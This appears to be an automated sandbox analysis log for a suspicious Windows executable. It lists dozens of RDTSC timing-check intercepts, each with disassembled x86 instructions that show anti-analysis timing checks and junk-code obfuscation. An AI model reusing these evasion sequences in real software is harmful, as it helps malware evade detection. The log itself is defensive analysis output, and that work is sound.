                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D33308 second address: D3330C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D3330C second address: D3339D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a adc edi, 476A9AAAh 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F0EC4502018h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov ebx, dword ptr [ebp+122D3236h] 0x00000032 mov ebx, 38A1FF21h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F0EC4502018h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 00000018h 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 movzx ebx, cx 0x00000056 xchg eax, esi 0x00000057 jns 00007F0EC450201Eh 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 jnp 00007F0EC4502016h 0x00000067 jmp 00007F0EC4502028h 0x0000006c popad 0x0000006d rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D323DD second address: D323ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0EC4CB7FCCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D3339D second address: D333A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D323ED second address: D323F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D333A3 second address: D333A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D323F1 second address: D3240B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jbe 00007F0EC4CB7FCCh 0x00000010 jno 00007F0EC4CB7FC6h 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D3240B second address: D3240F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D34391 second address: D34396 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D34396 second address: D3440B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0EC4502016h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F0EC4502020h 0x00000013 nop 0x00000014 or bl, 00000022h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F0EC4502018h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 mov edi, dword ptr [ebp+122D3260h] 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ecx 0x0000003e call 00007F0EC4502018h 0x00000043 pop ecx 0x00000044 mov dword ptr [esp+04h], ecx 0x00000048 add dword ptr [esp+04h], 00000017h 0x00000050 inc ecx 0x00000051 push ecx 0x00000052 ret 0x00000053 pop ecx 0x00000054 ret 0x00000055 mov bh, DEh 0x00000057 push eax 0x00000058 pushad 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D33509 second address: D33523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F0EC4CB7FD2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D33523 second address: D335A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, dword ptr [ebp+122D1F52h] 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov ebx, 72909CBDh 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F0EC4502018h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 00000014h 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c mov ebx, dword ptr [ebp+122D2144h] 0x00000042 mov eax, dword ptr [ebp+122D10F5h] 0x00000048 mov ebx, dword ptr [ebp+122D1DCFh] 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push ecx 0x00000053 call 00007F0EC4502018h 0x00000058 pop ecx 0x00000059 mov dword ptr [esp+04h], ecx 0x0000005d add dword ptr [esp+04h], 00000019h 0x00000065 inc ecx 0x00000066 push ecx 0x00000067 ret 0x00000068 pop ecx 0x00000069 ret 0x0000006a mov dword ptr [ebp+122D1FF6h], ecx 0x00000070 nop 0x00000071 push eax 0x00000072 push edx 0x00000073 jnp 00007F0EC450201Ch 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D335A7 second address: D335AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D335AB second address: D335B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D335B1 second address: D335BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D335BE second address: D335C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D363F9 second address: D363FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D363FD second address: D36438 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007F0EC4502021h 0x0000000d nop 0x0000000e jl 00007F0EC4502020h 0x00000014 pushad 0x00000015 add dword ptr [ebp+122D3A94h], eax 0x0000001b push edi 0x0000001c pop ebx 0x0000001d popad 0x0000001e push 00000000h 0x00000020 mov di, si 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 push esi 0x00000027 push eax 0x00000028 push edx 0x00000029 jne 00007F0EC4502016h 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D3559A second address: D3564A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0EC4CB7FD2h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 mov edi, ecx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F0EC4CB7FC8h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 jmp 00007F0EC4CB7FD1h 0x0000003a movzx ebx, bx 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 or dword ptr [ebp+122D2CC1h], ebx 0x0000004a mov eax, dword ptr [ebp+122D0FE1h] 0x00000050 mov ebx, dword ptr [ebp+122D2F38h] 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push edx 0x0000005b call 00007F0EC4CB7FC8h 0x00000060 pop edx 0x00000061 mov dword ptr [esp+04h], edx 0x00000065 add dword ptr [esp+04h], 00000014h 0x0000006d inc edx 0x0000006e push edx 0x0000006f ret 0x00000070 pop edx 0x00000071 ret 0x00000072 mov ebx, ecx 0x00000074 push eax 0x00000075 jc 00007F0EC4CB7FE2h 0x0000007b push eax 0x0000007c push edx 0x0000007d jns 00007F0EC4CB7FC6h 0x00000083 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D375D8 second address: D375E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D375E4 second address: D375E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D365E0 second address: D365E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D365E6 second address: D365F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F0EC4CB7FC6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D3967C second address: D39692 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D39692 second address: D3969D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0EC4CB7FC6h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D3AB72 second address: D3AB80 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0EC4502016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D3AC30 second address: D3AC3A instructions: 0x00000000 rdtsc 0x00000002 je 00007F0EC4CB7FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D3CD57 second address: D3CDEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502020h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jng 00007F0EC4502016h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007F0EC450201Ch 0x0000001b jmp 00007F0EC4502029h 0x00000020 popad 0x00000021 popad 0x00000022 nop 0x00000023 mov ebx, 53925BC1h 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007F0EC4502018h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 mov ebx, dword ptr [ebp+122D2DD0h] 0x0000004a and di, A55Ch 0x0000004f push 00000000h 0x00000051 mov dword ptr [ebp+122D3758h], ebx 0x00000057 xchg eax, esi 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F0EC450201Bh 0x00000060 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D3DCD1 second address: D3DD28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F0EC4CB7FC6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F0EC4CB7FC8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D316Bh], ecx 0x00000031 push 00000000h 0x00000033 cld 0x00000034 sub dword ptr [ebp+122D2144h], edx 0x0000003a xchg eax, esi 0x0000003b push esi 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F0EC4CB7FCFh 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D3DD28 second address: D3DD3E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0EC4502016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007F0EC4502016h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D3DD3E second address: D3DD48 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0EC4CB7FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D3AE84 second address: D3AE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D3EC6A second address: D3EC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D39DE9 second address: D39E6C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 sub di, 5063h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F0EC4502018h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e or ebx, dword ptr [ebp+122D3A8Dh] 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b or dword ptr [ebp+122D3ACCh], edx 0x00000041 mov eax, dword ptr [ebp+122D0AB9h] 0x00000047 push FFFFFFFFh 0x00000049 push 00000000h 0x0000004b push ebx 0x0000004c call 00007F0EC4502018h 0x00000051 pop ebx 0x00000052 mov dword ptr [esp+04h], ebx 0x00000056 add dword ptr [esp+04h], 0000001Ch 0x0000005e inc ebx 0x0000005f push ebx 0x00000060 ret 0x00000061 pop ebx 0x00000062 ret 0x00000063 mov bh, 4Bh 0x00000065 jne 00007F0EC450201Bh 0x0000006b push eax 0x0000006c push edi 0x0000006d push esi 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D3DE9C second address: D3DEA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D40B1F second address: D40B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D40B24 second address: D40B29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D40D65 second address: D40D83 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0EC4502016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0EC4502022h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CEF25E second address: CEF272 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0EC4CB7FCAh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F0EC4CB7FC6h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CEF272 second address: CEF276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D49283 second address: D49289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D49289 second address: D492CB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0EC4502016h 0x00000008 jmp 00007F0EC4502021h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F0EC450201Ah 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jne 00007F0EC4502016h 0x0000001f jmp 00007F0EC4502022h 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D492CB second address: D492CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D492CF second address: D492D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D492D5 second address: D492DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D492DC second address: D492E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D496A4 second address: D496A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D496A8 second address: D496BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502023h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D4B162 second address: D4B181 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007F0EC4CB7FC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F0EC4CB7FCFh 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D4B181 second address: D4B1B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502029h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F0EC450201Eh 0x00000010 popad 0x00000011 jbe 00007F0EC4502030h 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D4C751 second address: D4C757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D4C757 second address: D4C778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F0EC450201Eh 0x0000000b popad 0x0000000c jmp 00007F0EC450201Ch 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D4C778 second address: D4C77F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D4C77F second address: D4C79F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0EC4502021h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jc 00007F0EC4502016h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D511A5 second address: D511AF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0EC4CB7FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D511AF second address: D511C6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0EC4502018h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F0EC4502018h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D511C6 second address: D511DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jg 00007F0EC4CB7FC6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D511DB second address: D511EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D511EB second address: D511F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D560A9 second address: D560AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D552C7 second address: D552CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D552CB second address: D552F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0EC4502021h 0x0000000e pushad 0x0000000f jbe 00007F0EC4502016h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 pop eax 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D552F1 second address: D55308 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0EC4CB7FD2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D55474 second address: D5547C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5547C second address: D554DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F0EC4CB7FDDh 0x0000000b jmp 00007F0EC4CB7FD7h 0x00000010 push esi 0x00000011 jmp 00007F0EC4CB7FD1h 0x00000016 pushad 0x00000017 popad 0x00000018 pop esi 0x00000019 popad 0x0000001a push edx 0x0000001b jo 00007F0EC4CB7FCEh 0x00000021 jno 00007F0EC4CB7FC6h 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 pushad 0x0000002a jmp 00007F0EC4CB7FD3h 0x0000002f pushad 0x00000030 popad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D55AB6 second address: D55ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D55ABA second address: D55AEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F0EC4CB7FD0h 0x0000000d jmp 00007F0EC4CB7FD3h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D55D8C second address: D55DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jne 00007F0EC4502016h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D55DA3 second address: D55DA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
